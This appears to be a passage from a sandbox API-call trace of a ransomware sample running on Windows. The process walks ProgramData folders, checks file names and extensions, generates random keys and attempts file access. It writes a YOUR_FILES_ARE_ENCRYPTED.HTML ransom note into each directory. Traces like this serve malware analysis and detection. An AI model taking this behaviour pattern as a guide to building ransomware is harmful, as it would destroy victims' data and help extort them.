lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0156.776] CloseHandle (hObject=0x5a0) returned 1 [0156.777] GetProcessHeap 
() returned 0x270000 [0156.778] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0156.778] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa84024fc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa84024fc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8ea4dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x60, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0156.778] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 96 [0156.778] lstrcmpW (lpString1="folder.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.778] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0156.778] lstrlenW (lpString=".ico") returned 4 [0156.778] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0156.778] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8343e21, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8343e21, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8ea4dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="print_pref.ico", cAlternateFileName="")) returned 1 [0156.778] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 100 [0156.778] lstrcmpW (lpString1="print_pref.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0156.778] PathFindExtensionW (pszPath="print_pref.ico") returned=".ico" [0156.778] lstrlenW (lpString=".ico") returned 4 [0156.778] PathFindExtensionW (pszPath="print_pref.ico") returned=".ico" [0156.778] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8369f80, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8369f80, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d91063c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0x0, dwReserved1=0x60, cFileName="print_property.ico", cAlternateFileName="")) returned 1 [0156.778] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 104 [0156.778] lstrcmpW (lpString1="print_property.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.778] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0156.778] lstrlenW (lpString=".ico") returned 4 [0156.778] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0156.778] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83b623e, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa83b623e, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d91063c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x60, cFileName="print_queue.ico", cAlternateFileName="")) returned 1 [0156.778] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 101 
[0156.778] lstrcmpW (lpString1="print_queue.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.778] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0156.778] lstrlenW (lpString=".ico") returned 4 [0156.778] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0156.778] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83b623e, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa83b623e, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d9a8bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0x0, dwReserved1=0x60, cFileName="scan_.ico", cAlternateFileName="")) returned 1 [0156.778] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 95 [0156.778] lstrcmpW (lpString1="scan_.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.779] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0156.779] lstrlenW (lpString=".ico") returned 4 [0156.779] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0156.779] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa84024fc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa84024fc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d9a8bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0x0, dwReserved1=0x60, cFileName="scan_property.ico", cAlternateFileName="")) returned 1 [0156.779] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device 
Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 103 [0156.779] lstrcmpW (lpString1="scan_property.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.779] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0156.779] lstrlenW (lpString=".ico") returned 4 [0156.779] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0156.779] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83dc39d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa83dc39d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d9a8bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0x0, dwReserved1=0x60, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1 [0156.779] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 103 [0156.779] lstrcmpW (lpString1="scan_settings.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.779] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0156.779] lstrlenW (lpString=".ico") returned 4 [0156.779] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0156.779] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8213329, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8213329, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1daff81c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x60, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0156.779] wnsprintfW (in: 
pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 95 [0156.779] lstrcmpW (lpString1="tasks.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.779] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0156.779] lstrlenW (lpString=".xml") returned 4 [0156.779] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0156.779] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.779] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.779] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8213329, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8213329, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1daff81c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x60, cFileName="tasks.xml", cAlternateFileName="")) returned 0 [0156.779] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0156.780] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0156.780] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device 
Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.780] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0156.782] CloseHandle (hObject=0x598) returned 1 [0156.782] GetProcessHeap () returned 0x270000 [0156.783] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.783] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0 [0156.783] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.783] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0156.783] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 
hTemplateFile=0x0) returned 0x58c [0156.786] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.787] CloseHandle (hObject=0x58c) returned 1 [0156.788] GetProcessHeap () returned 0x270000 [0156.789] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.789] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9ebda38, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9ebda38, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Task", cAlternateFileName="")) returned 0 [0156.789] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.789] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0156.789] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.789] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.791] CloseHandle (hObject=0x4a8) returned 1 [0156.791] GetProcessHeap () returned 0x270000 [0156.792] HeapFree (in: hHeap=0x270000, 
dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.796] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x8a6f8efe, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0156.796] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync") returned 39 [0156.797] GetProcessHeap () returned 0x270000 [0156.797] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.798] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync" [0156.798] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*" [0156.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x8a6f8efe, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.799] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: 
lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x8a6f8efe, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.799] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x8a6f8efe, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.799] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.799] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0156.800] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\devicesync\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.800] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.802] CloseHandle (hObject=0x4a8) returned 1 [0156.802] GetProcessHeap () returned 0x270000 [0156.803] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 
1 [0156.803] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f09cf6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DRM", cAlternateFileName="")) returned 1 [0156.803] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM") returned 32 [0156.803] GetProcessHeap () returned 0x270000 [0156.803] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.803] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\DRM" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM" [0156.803] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*" [0156.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f09cf6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.804] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, 
ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f09cf6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.804] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6fb1a7ba, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Server", cAlternateFileName="")) returned 1 [0156.804] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server") returned 39 [0156.804] GetProcessHeap () returned 0x270000 [0156.804] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.805] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server" [0156.805] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*" [0156.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6fb1a7ba, ftLastWriteTime.dwHighDateTime=0x1ca0427, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.805] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6fb1a7ba, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.805] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6fb1a7ba, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.805] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.805] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0156.805] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\drm\\server\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.805] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, 
